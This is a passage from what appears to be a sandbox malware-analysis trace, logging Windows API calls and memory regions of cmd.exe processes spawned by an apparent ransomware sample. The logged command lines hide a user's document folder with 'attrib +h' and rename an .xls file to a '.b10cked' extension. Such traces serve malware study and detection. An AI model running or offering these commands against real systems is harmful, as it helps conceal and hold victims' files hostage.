lpPreviousValue=0x0) returned 1 [0133.812] GetStartupInfoW (in: lpStartupInfo=0x2ef258 | out: lpStartupInfo=0x2ef258*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0133.813] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.813] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef2f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef344 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"", lpProcessInformation=0x2ef344*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb54, dwThreadId=0xb44)) returned 1 [0133.815] CloseHandle (hObject=0x4c) returned 1 [0133.815] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.815] GetEnvironmentStringsW () returned 0x3c3808* [0133.815] FreeEnvironmentStringsW (penv=0x3c3808) returned 1 [0133.815] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0133.887] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef238 | out: lpExitCode=0x2ef238*=0x0) returned 1 [0133.887] CloseHandle (hObject=0x50) returned 1 [0133.887] _vsnwprintf (in: _Buffer=0x2ef380, _BufferCount=0x13, 
_Format="%08X", _ArgList=0x2ef244 | out: _Buffer="00000000") returned 8 [0133.887] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.887] GetEnvironmentStringsW () returned 0x3c3808* [0133.887] FreeEnvironmentStringsW (penv=0x3c3808) returned 1 [0133.887] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.887] GetEnvironmentStringsW () returned 0x3c3808* [0133.887] FreeEnvironmentStringsW (penv=0x3c3808) returned 1 [0133.888] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef29c | out: lpAttributeList=0x2ef29c) [0133.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.888] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.888] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.888] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.888] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.889] SetConsoleInputExeNameW () returned 0x1 [0133.889] GetConsoleOutputCP () returned 0x1b5 [0133.889] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.889] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.889] exit (_Code=0) Process: id = "122" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0xbbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" 
[0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12807 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12808 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12809 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12810 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 12811 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12812 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12813 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12814 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12815 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 12816 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12837 
start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12838 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12839 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12840 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 12841 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 12842 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12843 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12844 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12845 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12846 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12847 start_va = 0x76b40000 end_va 
= 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12848 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12849 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12850 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12851 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12852 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12853 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12854 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12855 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12856 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 12857 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" 
Region: id = 12858 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 12859 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 12860 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 178 os_tid = 0xa38 [0133.236] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfbec | out: lpSystemTimeAsFileTime=0x1cfbec*(dwLowDateTime=0x8959f620, dwHighDateTime=0x1d440a9)) [0133.236] GetCurrentProcessId () returned 0xbbc [0133.236] GetCurrentThreadId () returned 0xa38 [0133.236] GetTickCount () returned 0x2a562 [0133.236] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfbe4 | out: lpPerformanceCount=0x1cfbe4*=19002519657) returned 1 [0133.236] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0133.237] __set_app_type (_Type=0x1) [0133.237] __p__fmode () returned 0x76b331f4 [0133.237] __p__commode () returned 0x76b331fc [0133.237] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0133.237] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0133.237] GetCurrentThreadId () returned 0xa38 [0133.237] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa38) returned 0x38 [0133.237] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.237] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0133.237] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.237] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.237] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfb7c | out: phkResult=0x1cfb7c*=0x0) returned 0x2 [0133.237] VirtualQuery (in: lpAddress=0x1cfbb3, lpBuffer=0x1cfb4c, dwLength=0x1c | out: lpBuffer=0x1cfb4c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.237] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfb4c, dwLength=0x1c | out: lpBuffer=0x1cfb4c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.237] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfb4c, dwLength=0x1c | out: lpBuffer=0x1cfb4c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.237] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfb4c, dwLength=0x1c | out: lpBuffer=0x1cfb4c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.237] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfb4c, dwLength=0x1c | out: lpBuffer=0x1cfb4c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0133.238] GetConsoleOutputCP () returned 0x1b5 [0133.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.238] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0133.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0133.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.238] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.238] 
SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.238] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.238] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0133.239] GetEnvironmentStringsW () returned 0x2e01c8* [0133.239] FreeEnvironmentStringsW (penv=0x2e01c8) returned 1 [0133.239] GetEnvironmentStringsW () returned 0x2e01c8* [0133.239] FreeEnvironmentStringsW (penv=0x2e01c8) returned 1 [0133.239] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceaec | out: phkResult=0x1ceaec*=0x40) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x0, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x1, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x1, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x0, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x40, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x40, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x40, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.239] RegCloseKey (hKey=0x40) returned 0x0 [0133.239] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceaec | out: phkResult=0x1ceaec*=0x40) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x40, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x1, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x1, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x0, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x9, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.239] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", 
lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x4, lpData=0x1ceaf8*=0x9, lpcbData=0x1ceaf0*=0x4) returned 0x0 [0133.240] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceaf4, lpData=0x1ceaf8, lpcbData=0x1ceaf0*=0x1000 | out: lpType=0x1ceaf4*=0x0, lpData=0x1ceaf8*=0x9, lpcbData=0x1ceaf0*=0x1000) returned 0x2 [0133.240] RegCloseKey (hKey=0x40) returned 0x0 [0133.240] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886367 [0133.240] srand (_Seed=0x5b886367) [0133.240] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked\"" [0133.240] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked\"" [0133.240] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.240] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0133.240] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.240] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.240] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.240] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.240] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") 
returned 11 [0133.240] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0133.240] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.240] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.240] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.240] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.240] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0133.240] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.241] GetEnvironmentStringsW () returned 0x2e2318* [0133.241] FreeEnvironmentStringsW (penv=0x2e2318) returned 1 [0133.241] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.241] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.241] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.241] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.241] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.241] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.241] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.241] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.241] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.241] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.241] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf8b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.241] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf8b8, lpFilePart=0x1cf8b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf8b4*="Desktop") returned 0x18 [0133.241] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 
[0133.241] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf634 | out: lpFindFileData=0x1cf634) returned 0x2e0058 [0133.241] FindClose (in: hFindFile=0x2e0058 | out: hFindFile=0x2e0058) returned 1 [0133.241] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf634 | out: lpFindFileData=0x1cf634) returned 0x2e0058 [0133.241] FindClose (in: hFindFile=0x2e0058 | out: hFindFile=0x2e0058) returned 1 [0133.242] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf634 | out: lpFindFileData=0x1cf634) returned 0x2e0058 [0133.242] FindClose (in: hFindFile=0x2e0058 | out: hFindFile=0x2e0058) returned 1 [0133.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0133.242] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0133.242] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0133.242] GetEnvironmentStringsW () returned 0x2e2b38* [0133.242] FreeEnvironmentStringsW (penv=0x2e2b38) returned 1 [0133.242] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.242] GetConsoleOutputCP () returned 0x1b5 [0133.242] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.242] GetUserDefaultLCID () returned 0x409 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf9f8, cchData=128 | out: lpLCData="0") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf9f8, cchData=128 | out: lpLCData="0") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf9f8, cchData=128 | out: lpLCData="1") returned 2 [0133.243] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0133.243] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0133.243] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.244] GetConsoleTitleW (in: lpConsoleTitle=0x2d0908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.244] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.244] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0133.244] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0133.244] 